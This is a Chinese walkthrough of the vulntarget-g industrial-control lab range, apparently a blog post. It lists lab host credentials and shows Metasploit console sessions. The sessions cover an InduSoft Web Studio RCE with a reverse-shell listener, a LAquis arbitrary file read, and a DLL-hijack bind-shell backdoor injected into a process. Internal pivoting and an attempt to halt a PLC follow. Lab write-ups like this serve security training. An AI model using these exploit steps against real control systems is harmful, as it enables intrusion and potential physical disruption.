关注WX:【小白SEC】查看更多内容……
本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试
一、靶场信息:
下载地址:
百度云链接:
链接:https://pan.baidu.com/s/1R-9udIuoPavsTI18-lPP3Q?pwd=icsg
提取码:ics
拓扑图:
配置:
本地虚拟机网络配置
网络1:192.168.90.0/24
网络2:192.168.95.0/24
网络3:172.16.1.0/24
winxp_HMI:
【x.x.x.x(桥接ip)/192.168.90.40】
账号:vuln密码:Admin@123.
winxp_ZJQ:
【192.168.90.110/192.168.95.66】
winxp:winXP_ZIJINQIAO账号1:Administrator密码1:#xYpo3;W6aS
账号2:vulntarget密码2:#xYpo3;W6aS
win7_ForceControl:
【192.168.95.110】
账号:win7密码:admin
win7_S7-Client:
【192.168.95.100/172.16.1.37】
账号:tegratnluv密码:Vu1Nt@rG3t9Gg
win7_S7-Server:
【172.16.1.3】
账号:Vu1NT4r93t密码:welcometoICS
官方WP:vulntarget漏洞靶场系列(7)— vulntarget-g
二、使用到的工具、漏洞或技术:
工具:
Viper、searchsploit、DllInject、isf
漏洞或技术:
涉及工控漏洞知识
参考:
嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
工业控制靶场记录以及工业控制协议的简单介绍——讲的很详细
三、步骤:
靶场涉及很多工控系统,不熟,因此参照官方WP进行操作
- 通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.126.174,直接扫描靶机IP信息,使用nmap扫描:
- 根据wp提示,利用 msf 进行攻击,在此处 run 了好多次才成功:
msf6 > use exploit/windows/scada/indusoft_webstudio_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/indusoft_webstudio_exec) > options
Module options (exploit/windows/scada/indusoft_webstudio_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.126.174 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4322 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.126.168 yes The listen address (an interface may be specified)
LPORT 1111 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP / 2003
View the full module info with the info, or info -d command.
msf6 exploit(windows/scada/indusoft_webstudio_exec) >
- 上线后直接为system权限,在桌面找到【工作日记.md】,打开发现一些信息:
InduSoft Web Studio、紫金桥、LAquis #涉及的系统
#InduSoft Web Studio嵌入式HMI软件
======================================================
学习笔记 C:\Notes\HMI.txt
软件配置 C:\InduSoftWebStudiov7.1\Bin\CEView.ini
细节配置数据 C:\InduSoftWebStudiov7.1\Drv\A2420.ini
======================================================
#紫金桥(RealInfo)
======================================================
安装信息的配置文件 C:\RealInfo6.5\AUTORUN.INF
记录文档 C:\RealInfo6.5\DeviceSetup\note.txt
注意事项 C:\RealInfo6.5\ServerSetup\Public\tips.txt
服务项目等信息的文档 C:\RealInfo6.5\ServerSetup\RealServer\PrgTitle.Txt
关键的配置文件 C:\RealInfo6.5\ServerSetup\_Chinese\shortcut.ini,这个是中文版的,如果想看英文版的需要把Chinese改成English
======================================================
#LAquis
======================================================
学习文档 C:\Notes\SCADA.txt
配置文件C:\LAquis\modelos\SAMPLE1.INI
OMRON协议配置文件 C:\LAquis\Apls\Examples\ExemplosCLPs\OMRON\OMRONTESTE1.INI
======================================================
#压力测试
======================================================
压力测试信息 C:\document\information.txt
======================================================
#通知
======================================================
通知 C:\document\score.txt
======================================================
- 添加路由,进行内网探测,使用 MSF 模块:
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 135,139,445,80,443,3389 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.90.0/24 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 10 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-2000
PORTS => 1-2000
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.90.110RHOSTS => 192.168.90.110
msf6 auxiliary(scanner/portscan/tcp) > run
- 扫描发现1234、1235端口开放:
- 添加代理访问,为 LAquis ,LAquis4.1.0.2385版本存在任意文件读取漏洞:
- 使用 MSF 攻击,通过 kali 的 searchsploit 搜索 LAquis 利用脚本,并导入到 Viper 的 MSF 中,使用 reload_all 加载全部模块,再使用加入的 LAquis 模块:
- 进行如下涉及,读取文件:
msf6 exploit(windows/scada/indusoft_webstudio_exec) > use exploit/windows/scada/LAquis
msf6 auxiliary(windows/scada/LAquis) > set RHOSTS 192.168.90.110
RHOSTS => 192.168.90.110
msf6 auxiliary(windows/scada/LAquis) > set FILE document/information.txt
FILE => document/information.txt
msf6 auxiliary(windows/scada/LAquis) > options
Module options (auxiliary/windows/scada/LAquis):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 10 no Levels to reach base directory
FILE document/information.txt no This is the file to download
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.90.110 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1234 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(windows/scada/LAquis) > run
[*] Running module against 192.168.90.110
[*] Stored 'document/information.txt' to '/root/.msf4/loot/20230711074514_default_192.168.90.110_laquis.file_535915.txt'
[*] Auxiliary module execution completed
msf6 auxiliary(windows/scada/LAquis) >
- 下载读取到的文件,改变编码查看:
主机备忘录
主机1:
账户:vuln
密码:Admin@123.
主机2:
账号:vulntarget
密码:#xYpo3;W6aS
主机3:
账号:win7
密码:admin
主机4:
终于来到这里了,可是却没有得到主机4的账户密码,但是根据可靠消息得知,主机4的账户、密码可能在力控软件的用户信息里,你能找到他吗?
- 账号密码信息都给了,配置代理进行远程登录主机2:
- 此处查看软件信息,利用紫金桥dll劫持上线msf:
- 建立监听,生成正向dll后门,同时需要上传需要的工具 :
msf6 payload(windows/meterpreter/bind_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LPORT 1111
LPORT => 1111
msf6 exploit(multi/handler) > set RHOST 192.168.90.110
RHOST => 192.168.90.110
msf6 exploit(multi/handler) > run
mstsc.exe 需要设置后才能传输文件
- 将生成的dll文件注入到 progman 进程中:
上线后进行提权操作,命令: getsystem
- 添加路由,扫描 192.168.95.1/24 网段:
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.95.1/24RHOSTS => 192.168.95.1/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 135,139,445
ports => 135,139,445
msf6 auxiliary(scanner/portscan/tcp) > run
扫描太慢,使用了 netbios 探测到其他存活IP 192.168.95.100 和 192.168.95.110 :
- 经过测试,使用前文找到的密码成功登录到 win7 :
- 继续根据前文的文本查找主机4的密码,在力控软件中找到用户:
- 在密码后面添加 xype 方便待会查找:
- 按照如下操作,搜索到密码信息:
- 去除到添加的 xype 后,得到密码,账号密码为
tegratnluv/Vu1Nt@rG3t9Gg
,测试远程登录主机,目标为S7COMM的客户端模拟器:
- Viper 生成正向后门程序,上传并执行:
- 发现还存在 172.16.1.37 网段,继续搜索内网,发现存活 172.16.1.3 IP:
根据官方WP提示,现在要做的是将下位机打停机,对于工控不懂,这一步利用的时候也未成功,工具地址在官方WP中有。
- 完整链路图:
靶场WP持续更新……